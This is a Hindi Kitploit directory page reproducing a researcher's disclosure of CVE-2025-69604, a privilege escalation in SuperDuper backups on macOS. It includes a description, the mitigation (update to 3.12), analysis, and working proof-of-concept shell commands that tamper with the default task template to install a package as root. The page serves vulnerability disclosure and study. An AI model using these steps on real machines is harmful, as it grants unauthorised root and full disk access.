Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-69604 — CVE-2025-69604 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो macOS पर SuperDuper बैकअप कार्यों में दुर्भावनापूर्ण पैकेज इंस्टॉलेशन के माध्यम से विशेषाधिकार वृद्धि (privilege escalation) प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/graypixel2121/cve-2025-69604
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षा
GitHubgraypixel2121/cve-2025-69604

CVE-2025-69604

CVE-2025-69604 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो macOS पर SuperDuper बैकअप कार्यों में दुर्भावनापूर्ण पैकेज इंस्टॉलेशन के माध्यम से विशेषाधिकार वृद्धि (privilege escalation) प्रदर्शित करता है।

रिपॉजिटरी देखें
37 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-69604

विवरण

यह भेद्यता CVE-2025-61229 में वर्णित भेद्यता के समान है – एक हमलावर कार्य टेम्पलेट को संपादित करके SuperDuper बैकअप कार्यों से एक मनमाना पैकेज इंस्टॉल करवा सकता है। पैकेज फिर रूट उपयोगकर्ता के रूप में और गोपनीयता पहुंच के उच्चतम स्तर (पूर्ण डिस्क पहुंच) के साथ शेल स्क्रिप्ट चला सकता है।

संदर्भ

  • SuperDuper सुरक्षा अपडेट v3.12
  • CVE-2025-69604

CVSS 3.1 स्कोर: NVD स्कोर लंबित है।

शमन

इस भेद्यता से बचने के लिए, या तो SuperDuper! एप्लिकेशन को हटा दें, या 3.12 अपडेट लागू करें।

अस्वीकरण

यह एक्सप्लॉइट विश्लेषण और प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसे अपने जोखिम पर उपयोग करें।

उच्च-स्तरीय सारांश

SuperDuper CVE-2025-61229 भेद्यता के मेरे पिछले विश्लेषण में, मैंने पाया कि डेवलपर द्वारा SuperDuper 3.11 अपडेट में उस भेद्यता को संबोधित करने के बाद भी SuperDuper Default Settings टेम्पलेट स्वाभाविक रूप से असुरक्षित था। उस अपडेट ने केवल CVE-2025-61229 में विस्तृत विशिष्ट भेद्यता को संबोधित किया, लेकिन इस तथ्य को संबोधित नहीं किया कि एक हमलावर डिफ़ॉल्ट कार्य टेम्पलेट को संशोधित कर सकता है। दुर्भाग्यवश, कार्य टेम्पलेट में पैकेज इंस्टॉल करने की कार्यक्षमता शामिल है, इसलिए एक हमलावर कार्य टेम्पलेट को संशोधित करके ऐसा पैकेज निर्दिष्ट कर सकता है जो रूट उपयोगकर्ता के रूप में और पूर्ण डिस्क पहुंच के साथ सॉफ़्टवेयर इंस्टॉल कर सकता है या शेल स्क्रिप्ट चला सकता है।

डेवलपर ने "पैकेज इंस्टॉल करें" कार्यक्षमता को हटाकर इस भेद्यता को कम किया। फिर भी, एक हमलावर कार्य सेटिंग्स टेम्पलेट को अब भी संशोधित कर सकता है, और डेवलपर ने यह भी संकेत दिया कि उपयोगकर्ता को परेशान किए बिना इसे हल नहीं किया जा सकता (अर्थात हर बार कार्य संशोधित होने पर उपयोगकर्ता को प्रमाणित करने की आवश्यकता)। इसलिए ऐसा लगता है कि डिफ़ॉल्ट कार्य टेम्पलेट निकट भविष्य में संशोधन के लिए असुरक्षित बना रहेगा, क्योंकि डेवलपर इसे और अधिक सुरक्षित बनाने का कोई अन्य तरीका नहीं खोज सका।

मेरा पिछला निष्कर्ष दोहराने लायक है: रूट विशेषाधिकार और पूर्ण डिस्क पहुंच वे उच्चतम विशेषाधिकार हैं जो सॉफ़्टवेयर macOS पर प्राप्त कर सकता है। कोई भी डेवलपर जो उन विशेषाधिकारों को मांगता है, उसे आधुनिक सुरक्षा डिज़ाइन सिद्धांतों और सर्वोत्तम प्रथाओं का पालन करने वाला सॉफ़्टवेयर लिखना चाहिए। यह भेद्यता, साथ ही CVE-2025-57489 और CVE-2025-61228 में उजागर हुई भेद्यताएं, और यहां तक कि डेवलपर की अपनी स्वीकारोक्ति कि ये समस्याएं 22 वर्षों से बनी हुई हैं, यह दर्शाती हैं कि SuperDuper एक सुरक्षित उत्पाद होने के लिए डिज़ाइन नहीं किया गया था, और 22 वर्षों में आधुनिक सर्वोत्तम प्रथाओं का पालन करने के लिए इसमें नियमित डिज़ाइन सुधार नहीं हुए हैं।

विश्लेषण: पुनर्विचार: आधुनिक सॉफ़्टवेयर को इस तरह की लापरवाह सुरक्षा गलतियाँ नहीं करनी चाहिए

इस भेद्यता पर CVE-2025-61229 के लगभग ठीक उसी तरीके से हमला किया जाता है, इसलिए मैं उस भेद्यता के अपने पिछले विश्लेषण का ही अनुसरण करूंगा। निम्नलिखित प्रूफ ऑफ कॉन्सेप्ट SuperDuper के संस्करण 3.11 के साथ एक्सप्लॉइट को प्रदर्शित करता है:

root@kitploit:~
mkdir -p /tmp/scripts
cd ~; export home=`pwd`; export user=`whoami`
printf '#!/bin/bash\n' > /tmp/scripts/preinstall
printf "ls -l $home/Desktop > /Library/private_data.txt\n" >> /tmp/scripts/preinstall
chmod a+x /tmp/scripts/preinstall
pkgbuild --identifier com.gray.sdexploit --nopayload --scripts /tmp/scripts /tmp/attack.pkg

cd ~/'Library/Application Support/SuperDuper!/Saved Settings/.Default Settings.sdsp'
cp 'Session Settings.sdss' Settings.plist
defaults write "`pwd`"/Settings.plist SDshouldInstallPackage -bool YES
defaults write "`pwd`"/Settings.plist SDinstallerPackage /tmp/attack.pkg
cp Settings.plist 'Session Settings.sdss'

उन कमांड्स को पूरा करने के बाद, बस डिफ़ॉल्ट सेटिंग्स के साथ एक बैकअप चलाएँ और attack.pkg रूट विशेषाधिकारों और पूर्ण डिस्क पहुंच के साथ इंस्टॉल हो जाएगा। अंतिम परिणाम /Library में "private_data" नामक एक फ़ाइल है (अर्थात केवल रूट द्वारा लिखने योग्य) जिसमें आपके Desktop फ़ोल्डर की सूची होती है (अर्थात जिसे केवल पूर्ण डिस्क पहुंच के साथ चलने वाले कोड द्वारा ही एक्सेस किया जा सकता है)।

टूल डाउनलोड करें